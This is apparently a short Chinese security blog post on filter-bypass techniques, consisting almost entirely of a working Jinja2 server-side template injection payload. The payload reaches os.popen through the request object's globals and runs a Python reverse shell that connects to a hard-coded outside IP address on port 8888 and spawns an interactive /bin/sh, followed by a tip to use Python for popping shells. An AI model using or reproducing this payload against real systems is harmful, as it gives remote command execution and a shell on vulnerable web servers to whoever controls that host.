绕过类型

{{ eval popen 

{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"129.211.9.7\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"')['read']()%} a {% endif %}

注意弹shell用python弹


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!

基本功 Previous
sql注入 Next